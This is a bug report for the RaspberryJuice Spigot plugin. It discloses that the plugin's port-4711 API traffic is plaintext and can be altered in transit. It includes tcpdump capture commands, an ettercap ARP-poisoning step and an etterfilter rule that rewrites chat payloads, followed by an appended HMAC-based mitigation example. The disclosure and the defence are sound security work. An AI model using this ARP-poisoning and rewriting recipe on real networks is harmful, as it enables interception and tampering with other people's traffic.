SpigotPlugins / PLUG-464

Unencrypted/unauthenticated client/server traffic leads to MITM vulnerability in Spigot/RaspberryJuice


Details

    • Spigot version: 3279-Spigot-3892929-2071671 (MC: 1.17.1) (Implementing API version 1.17.1-R0.1-SNAPSHOT)
    • Plugin version: RaspberryJuice 1.12.1
    • Yes

    Description

      When a client connects to RaspberryJuice, all traffic appears on the network in plain text. Furthermore, the data sent by the client can be manipulated and resent to the server while still appearing to come from the client:

      This bug seems to affect the current and all previous versions of RaspberryJuice and Spigot.

      Reproduce the issue with a server running Spigot/RaspberryJuice listening on port 4711 and a client on the same network with python3 and the mcpi library. Here is a test script:

      # Connect to the RaspberryJuice API (TCP port 4711 by default) and post a chat message.
      from mcpi.minecraft import Minecraft

      mc = Minecraft.create(address="192.168.56.1")
      mc.postToChat('Hello Minecraft')

      On the attacker box, use ettercap to run ARP poisoning; the data is now visible unencrypted with tcpdump:

      # capture traffic to/from the plugin port on the poisoned segment
      tcpdump -A -i eth1 port 4711 and host 192.168.56.110
      04:05:09.845686 IP 192.168.56.110.39210 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057102917 ecr 39383616], length 27
      E..O.@@.@..B..8n..8g.*.g@.C._@.............
      ?..E.X.@chat.post(Hello Minecraft)


      To manipulate the data, load into ettercap the following filter, compiled with "etterfilter fil.ecf -o fil.ef":
      # match client->server segments to port 4711 whose payload carries the chat text
      if (ip.proto == TCP && tcp.dst == 4711 && search(DATA.data, "Hello Minecraft")) {
        # keep a copy of the original payload
        log(DATA.data, "/tmp/mispelled_ettercap.log");
        # rewrite the payload in place (replacement is the same length, 15 bytes, so the segment stays 27 bytes)
        replace("Hello Minecraft", "Message Hacked!");
        # report the rewrite in the ettercap UI
        msg("Altered Client Message\n");
      }


      Resend the message from the client, and it will now be altered:

      04:10:37.084001 IP 192.168.56.110.39212 > 192.168.56.103.4711: Flags [P.], seq 1:28, ack 1, win 229, options [nop,nop,TS val 1057429973 ecr 39710674], length 27
      E..O=u@.@.....8n..8g.,.g9b"................
      ?....]..chat.post(Message Hacked!)

      Suggestions to prevent this:
      I haven't tested the other plugins to confirm, but protecting this with an encrypted/authenticated channel is possible at the Spigot and/or plugin level, by using TLS for authentication and a cipher like RSA, DH or ECDH for key exchange.
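The following is an added illustration, not code from the report or from the RaspberryJuice project. It models the plaintext mcpi command line that tcpdump shows ("chat.post(Hello Minecraft)\n", 27 bytes), the in-flight substitution performed by the etterfilter rule above (both strings are 15 bytes, so the rewritten segment keeps the same length, matching the two captures), and then one minimal form of the authentication the report asks for: a hypothetical HMAC-SHA256 tag over each command line under a pre-shared key, which a rewrite would invalidate. The key, the framing and the function names are assumptions for this example only; TLS, as suggested in the report, would additionally provide confidentiality and key exchange.

```python
import hashlib
import hmac


def encode_command(method: str, *args) -> bytes:
    """Wire format mcpi sends to RaspberryJuice on TCP/4711: one ASCII line per
    command, "name.method(arg1,arg2,...)\\n", with no encryption or authentication."""
    return f"{method}({','.join(str(a) for a in args)})\n".encode("ascii")


def ettercap_style_rewrite(payload: bytes,
                           needle: bytes = b"Hello Minecraft",
                           replacement: bytes = b"Message Hacked!") -> bytes:
    """Model of the etterfilter rule in the report: if the TCP payload contains the
    needle, swap it for the replacement and forward the segment otherwise unchanged.
    Needle and replacement are both 15 bytes, so segment length and TCP sequence
    numbers stay consistent, as the two tcpdump captures show (length 27 both times)."""
    if needle in payload:
        return payload.replace(needle, replacement)
    return payload


# --- Hypothetical authenticated framing (not part of RaspberryJuice) ----------
# Pre-shared key known to client and plugin; constructed for this example only.
SHARED_KEY = b"example-pre-shared-key-do-not-use"
TAG_LEN = hashlib.sha256().digest_size * 2  # hex-encoded HMAC-SHA256 tag length


def seal(payload: bytes, key: bytes = SHARED_KEY) -> bytes:
    """Prefix the command line with an HMAC-SHA256 tag computed over the payload."""
    tag = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    return tag + b" " + payload


def open_sealed(frame: bytes, key: bytes = SHARED_KEY):
    """Return the payload if its tag verifies, otherwise None (the server must drop it).
    compare_digest avoids leaking the mismatch position through timing."""
    tag, sep, payload = frame.partition(b" ")
    if not sep or len(tag) != TAG_LEN:
        return None
    expected = hmac.new(key, payload, hashlib.sha256).hexdigest().encode("ascii")
    if not hmac.compare_digest(tag, expected):
        return None
    return payload


def demo() -> dict:
    """Run the plaintext attack and the authenticated variant side by side."""
    plain = encode_command("chat.post", "Hello Minecraft")
    tampered = ettercap_style_rewrite(plain)          # accepted as-is by a plaintext server
    sealed = seal(plain)
    return {
        "plain": plain,
        "tampered": tampered,
        "same_length": len(plain) == len(tampered),
        "sealed_ok": open_sealed(sealed) == plain,
        # the same rewrite applied to the sealed frame breaks the tag
        "sealed_tampered": open_sealed(ettercap_style_rewrite(sealed)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

A shared-key MAC only gives integrity and origin authentication; it does not hide the chat text from the sniffer, and without a per-message counter or nonce an attacker could still replay a captured, validly tagged command. The TLS approach the report suggests covers both gaps and removes the need to pre-distribute a key.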

      People

        Assignee: Unassigned
        Reporter: Tariq Hawis (tariqhawis)